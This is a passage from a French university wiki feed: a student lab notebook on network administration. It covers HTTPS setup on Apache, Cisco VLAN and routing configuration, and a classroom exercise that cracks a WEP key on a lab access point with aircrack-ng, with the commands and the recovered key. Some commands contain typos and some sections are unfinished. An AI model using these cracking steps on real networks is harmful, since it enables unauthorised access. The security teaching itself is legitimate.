      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA-PSK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur =====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E304 !! E306&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Commutateur&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248                      &lt;br /&gt;
   ipv6 address FE80::42:2 link-local                                         &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
Question pour Redon addresse Ip à définir &lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   int XXXX&lt;br /&gt;
   ip address 10.10.10.2 255.255.255.0&lt;br /&gt;
   vrrp 1 ip 10.10.10.3                     &lt;br /&gt;
   vrrp 1 preempt                          //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place&lt;br /&gt;
   vrrp 1 priority 100                     //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020&amp;diff=51111</id>
		<title>TP système &amp; reseau IMA2a5 2019/2020</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020&amp;diff=51111"/>
				<updated>2019-11-24T19:15:36Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Bienvenue sur l'article wikipédia de la promotion 2017 - 2020 de la section IMA2A5. Cette page traite du sujet de protocole avancé vu en semestre 9.&lt;br /&gt;
Le lien vers le sujet est : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html]&lt;br /&gt;
&lt;br /&gt;
== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Page du groupe !! Prénom &amp;amp; NOM  !! Nom de domaine acheté !! Certificat associé ?&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2019/2020 G1 | Cahier groupe n°1]]&lt;br /&gt;
| Fabien CAVALIER  &amp;amp; Maxime HIRT&lt;br /&gt;
|[https://ima2a5-zerofun.site https://ima2a5-zerofun.site ]&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2019/2020 G2 | Cahier groupe n°2]]&lt;br /&gt;
| Ekaterina ISHCHUK &amp;amp; Loick MOLLET&lt;br /&gt;
| [https://ima2a5-mol-ish.site https://ima2a5-mol-ish.site]&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2019/2020 G3 | Cahier groupe n°3]]&lt;br /&gt;
| Quentin WEISBECKER &amp;amp; Pascal COINT&lt;br /&gt;
|[https://ima2a5-rex4ever.site https://ima2a5-rex4ever.site]&lt;br /&gt;
|[https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Affectation_du_certificat_sur_Gandi.net voir ici]&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2019/2020 G4 | Cahier groupe n°4]]&lt;br /&gt;
| Malick SECK &amp;amp; Gael WATBLED&lt;br /&gt;
|[https://ima2a5-wateck.site https://ima2a5-wateck.site]&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2019/2020 G5 | Cahier groupe n°5]]&lt;br /&gt;
| Quentin Verne&amp;amp; Adrien MONFILLIETTE&lt;br /&gt;
|[https://ima2a5-nofun.site https://ima2a5-nofun.site]&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2019/2020 G6 | Cahier groupe n°6]]&lt;br /&gt;
| Hamza FAHIM &amp;amp; Jorge CABRAL-DAS-DORES&lt;br /&gt;
| [https://ima2a5-4fun.site https://ima2a5-4fun.site]&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
